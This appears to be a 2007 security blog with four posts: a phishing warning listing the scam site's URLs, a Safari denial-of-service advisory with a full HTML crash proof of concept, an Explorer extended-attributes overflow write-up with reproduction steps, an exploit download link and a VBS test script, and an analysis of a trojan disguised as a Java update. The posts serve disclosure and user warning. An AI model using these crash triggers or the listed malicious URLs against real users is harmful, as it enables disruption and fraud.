Skype phishing and other payment-method scams

Sunday, June 17, 2007
################################################
Skype phishing and other payment-method scams
###############################################

Today I received an e-mail asking me to update
the information on my Skype account (a service I do not use).


It is a new way of getting hold of the passwords of
unwary users, but this one goes a little further.

If, unfortunately, we go to the malicious site:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/login.html

besides losing our Skype account we have much more to lose,
because the malicious page also tries, by deception, to get
hold of several of our passwords or important details of our
online payment methods.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/c2.php

Our PayPal account:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/PayPal%20-%20Log%20In.htm


Our Moneybookers account:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/bookf.htm

as well as the details of our Visa and/or MasterCard card.


Make sure the addresses you visit are the genuine ones of the
payment sites; if not, do not enter any data on them, and even
when they are legitimate you should still be suspicious.

################## €nd ###################################

--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Safari 3.0.1 (552.12.2) for Windows corefoundation.dll DoS

Saturday, June 16, 2007
############################################
Safari 3.0.1 (552.12.2) for Windows corefoundation.dll DoS
Vendor URL: www.apple.com/safari/
Advisory: http://lostmon.blogspot.com/2007/06/safari-301-552122-for-windows.html
Vendor notified: yes   Exploit available: yes
BID: 24497
###########################################

Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crash occurs due to issues in the
functions that manage the History and All History, and results
in loss of availability for the application. I don't know whether this
can execute arbitrary code.



#############
Versions:
#############

Safari 3.0.1

###########
Solution:
###########

Update to version 3.0.2

##########
Timeline:
##########

Discovered: 14-06-2007
Vendor notified: 15-06-2007
Vendor response:
Disclosure: 16-06-2007

#####################
Details of the crash
#####################

See the screenshot:

http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif

--

Crash !

AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd

#################
Safari crash PoC
#################
Save this file as an HTML document and open it in Safari;
type some number into the second form and Safari crashes.

<html><head><title>Safari 3.0.1 beta for Windows Crash PoC by Lostmon</title></head>
<body>
<p>Safari 3.0.1 beta for Windows Crash PoC by Lostmon (Lostmon@Gmail.com)</p>
<p>Put some number in the second form to crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>

#################### €nd #####################

Thanks to Estrella for being my light
Thanks to all Lostmon's groups
Thanks to all who believe in me!!

--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Buffer overflow in extended file attributes in Explorer.exe

Monday, June 04, 2007
#######################################################
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file attributes.
Vendor URL: http://www.microsoft.com/
Advisory: http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html
Vendor notified: yes   Vendor confirmed: yes   Exploit included: NO
#######################################################

################
SUMMARY:
################

1- History (how and why)
2- Explanation of the buffer overflow
3- Versions tested
4- Solution
5- Timeline
6- Response from vendor
7- Test
8- Related vulns and documentation



####################
1-History:
####################


If we look at this MS advisory, the information in the section:

http://www.microsoft.com/technet/security/advisory/933052.mspx

--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:

The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--

this is not entirely true :)

If the user downloads the file and puts it in a folder, Explorer
crashes when the folder is opened...

If you open any program that uses the Windows API and ole32.dll to
open files, go to File/Open and navigate to the folder containing the
malformed doc file, Explorer calls ole32.dll and the program
crashes, losing all unsaved information.

Examples of this case:

Notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notified on 27-05-2007 via e-mail, no response)

Multiple Macromedia family programs => http://www.macromedia.com
(Adobe informed on 27-05-2007 via web form and confirmed:
http://www.adobe.com/misc/securityform.html)

Multiple other programs are affected.

After a simple study of the malformed Word document exploit/vulns
I have a small observation: I think this vuln can be triggered
in other programs, not only in a Word application.

After monitoring Explorer and some DLLs I think this is only
the tip of the iceberg. The overflow occurs when Explorer
calls the KERNEL32 module, which makes some system calls
through ntdll.dll to manage the information of any file.

In the functions GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile in ntdll.dll.

These functions obtain the extended file attributes; if the information
is too long, in the sub-functions FileAllInformation(), FileNameInformation()
and others (see FILE_INFORMATION_CLASS) we get a buffer overflow, and
some other sub-functions can hit the same error.

Windows shows the extended file attributes in multiple parts of the system:
when viewing a folder, and when hovering the mouse over a file or a folder.

Other applications use the same files to do the same :)

#######################
2-Explanation
#######################

Extended file attributes is a file system feature that enables users to
associate computer files with metadata not interpreted by the filesystem,
whereas regular attributes have a purpose strictly defined by the filesystem
(such as permissions or records of creation and modification times). Unlike
forks, which can usually be as large as the maximum file size, extended
attributes are usually limited in size to a value significantly smaller than
the maximum file size. Typical uses can be storing the author of a document,
the character encoding of a plain-text document, or a checksum.




A local buffer overflow exists in Windows Explorer.
The extended file attribute functions have a small buffer size in
FileAllInformation(), FileNameInformation() and other sub-functions of
the undocumented NTDLL functions, resulting in a buffer overflow
with unknown impact.



These are the buffer sizes of the related functions
and the main function involved:

FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile

FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile

Other functions can be vulnerable too;
look at this table:

http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html


When we hover over a file, explorer.exe reads the extended
file attributes and shows this information in a tooltip 'bubble'; when
opening a folder, Explorer obtains the directory listing, file
names and other information about the files.

How to locate the overflow?

1- Create a new txt file, for example explorer.txt
2- Right-click on the file and open Properties
3- In all of the boxes (Author, Title, Subject, and especially
the Comments text area) write a long run of the same character, for example many A's:



4- Use Filemon (http://www.microsoft.com/technet/sysinternals/FileAndDisk/Filemon.mspx)

and include the process explorer.exe in its filter.

5- Click on the txt file's Properties and click Accept or Apply.

6- Go to Filemon and look at the log for explorer.exe; you will have
something similar to this:


21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options: Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options: OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation

The overflow has occurred :)

Afterwards you can hover over the file and Explorer shows the extended file attributes,
and sometimes Filemon flags the overflow again.


###################
3-versions tested
###################

I only tested with:

Microsoft Windows XP Home Edition, all fixes as of 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

###################
4-Solution
###################

Wait for an update or patch.

####################
5-Timeline:
####################

Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007

######################
6-Response from vendor
######################

Thank you for checking up on this case. We have concluded
our investigation on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milw0rm posting (http://www.milw0rm.com/exploits/3419).
As we have not been able to find an exploitable angle for
this issue, this crash will be tracked into the next available
Service Pack fix.

#####################
7- Test
#####################

1- Download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
uncompress it into c:\test, or edit EFA_test.vbs with the correct
path where you put the malformed doc file.

2- Copy EFA_test.vbs and edit the correct path to the file.

3- Execute EFA_test.vbs

The script looks for the extended file attributes
of the malformed doc file, and when it tries to read
the "Author" attribute, Windows Scripting Host
crashes.

Other overflows could be triggered from all boxes of
the file properties.
Here the application crashing is the script host, because
we use a VBS script to look at the malformed doc file;
any other application that tries to look at the malformed
doc file crashes too.

This is a simple test using an existing exploit for
Microsoft ole32.dll, but the overflow is deeper, in ntdll.dll,
because ntdll.dll is the library that NtQueryInformationFile
uses to obtain the extended file attributes.

That is why this overflow can be triggered with any
file type that has malformed extended file attributes.



########################################
8-Related vulns and documentation
########################################

########################
EFA_test.vbs
########################

' Enumerates the shell "details" columns (Author, Title, Subject, Comments...)
' of every file in C:\test, the same metadata Explorer reads for its tooltips.
' Edit the path below to the folder holding the malformed doc file.
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
' Passing the folder's item collection returns the column names.
For i = 0 To 34
    arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
' Passing a single item returns that column's value for the file;
' reading the Author column of the malformed file is where the host crashes.
For Each strFileName In objFolder.Items
    For i = 0 To 34
        WScript.Echo i & vbTab & arrHeaders(i) _
            & ": " & objFolder.GetDetailsOf(strFileName, i)
    Next
Next



###################
RELATED VULNS :
###################

http://secunia.com/advisories/10020/

http://secunia.com/advisories/10194/

http://osvdb.org/displayvuln.php?osvdb_id=31885

http://osvdb.org/displayvuln.php?osvdb_id=31886

http://osvdb.org/displayvuln.php?osvdb_id=31887

###################
Related Exploit
###################

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

#################
Related Microsoft
security bulletin
#################

http://www.microsoft.com/technet/security/advisory/933052.mspx

##################
Related functions
##################

Extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes

GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1

File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html

Possible source code of ntdll:
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
The links to ntdll.c and ntdll.h are apparently dead; you can try
to search for them in Google's cache, sorry for the inconvenience.

###############################€nd#########################

Thanks to Estrella for being my light
Thanks to FalconDeOro; he investigated and documented this issue with me.
Thanks to Icaro and the Badchecksum Team for their interest in the research.
Thanks to Jkouns and Jericho for their patience.
Thanks to all OSVDB manglers; they are involved in a very nice project.
Thanks to the Secunia Research Team; they do very good co-work with researchers
and put in my hands everything I needed in this and other research.
Thanks to all of Lostmon's Group Team
Thanks to Microsoft for the responses.

--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Trojan posing as a Java update

Saturday, June 02, 2007
In recent days an e-mail has been circulating
which informs us of a security flaw in Java.


That same e-mail urges us to download the update that
will fix the security problem.

Going to the download site, which apparently resembles the Sun
Microsystems download site, a file called install_javav6up2.exe
is downloaded, and it contains a trojan.


If we get a short report on the file we see that even the file's
version information has been faked to make it appear to come from Sun.
The message includes several URLs that come from a server which
has probably already been compromised.

http://201.22.57.XX/JAVA/_software/update/index.php?request=Update&program=java
http://201.22.57.XX/JAVA/_software/update/index.php?USUARIO=5B3U6H843N45E82
http://201.22.57.XX/JAVA/_software/download/get.php?license=5B3U6H843N45E82&mode=manual

####################
Analysis of the file
####################


********************************************************************
FileAlyzer © 2003-2005 Patrick M. Kolla. All Rights Reserved.
********************************************************************


File: C:\Documents and Settings\Lostmon\Escritorio\install_javav6up2.exe
Date: 02/06/2007 2:04:08


***** General ******************************************************
Ubicación: C:\Documents and Settings\Lostmon\Escritorio\
Tamaño: 192512
Versión: 1.2.5.2
CRC-32: 93EEBEE2
MD5: 70CACC3D64585343F6AA04C3135BA24B
SHA1: 20E9C0990D76AB1E8CF84C9425B3F64365E94926
Sólo lectura: No
Oculto: No
Archivo del sistema: No
Carpeta de archivos: No
Archivo: Yes
Enlace simbólico: No
Time stamp: sábado, 02 de junio de 2007 11:31:36
Creado: sábado, 02 de junio de 2007 11:31:34
Último acceso: sábado, 02 de junio de 2007 2:01:16
Modificado: sábado, 02 de junio de 2007 11:31:36


***** Versión ******************************************************
Idiomas soportados:: Portugués (Brasil) (1046/1252)
--- Versión --------------------------------------------------------
Versión del archivo: 1.2.5.2
Empresa: Java
Nombre interno:
Comentarios:
Copyright:
Marcas registradas:
Nombre original: instal_plugin98MEXP.exe
Nombre del producto:
Versión del producto: 2.0.0.0
Descripción: Sun Microsystems Corporation - Arquivo de atualização
Versión privada:
Versión especial:



***** Cabecera PE **************************************************
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0008
Time/Date stamp: 2A425E19
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 818E
Magic: 010B
Linker version (major): 02
Linker version (minor): 19
Size of code: 00000000
Size of initialized data: 0000E800
Size of uninitialized data: 00000000
Address of entry point: 00064BD6
Base of code: 00001000
Base of data: 00050000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 00066000
Size of headers: 00000400
Checksum: 000308BA
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00004000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010


***** Secciones PE *************************************************
CRC-32: 7059EB4D
MD5: 83C09E84F35E245A0ADA5CC66D4C9B3B
----- Secciones PE -------------------------------------------------
Sección TamañoVirt. DirecciónVirt. TamañoFís. TamañoFís. Parámetros
0004F000 00001000 00028600 00000400 C0000040
00002000 00050000 00000A00 00028A00 C0000040
00001000 00052000 00000000 00029400 C0000040
00002000 00053000 00000E00 00029400 C0000040
00001000 00055000 00000000 0002A200 C0000040
00007000 00056000 00000200 0002A200 C0000040
.rsrc 00006000 0005D000 00002400 0002A400 C0000040
00003000 00063000 00002800 0002C800 C0000040


***** Importar/Exportar tabla **************************************
--- Export table ---------------------------------------------------
--- Import table (libraries: 2) ------------------------------------
kernel32.dll (imports: 1)
GetModuleHandleA
user32.dll (imports: 1)
MessageBoxA

################## €nd #############

--
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
Curiosity is what makes the mind move....
 
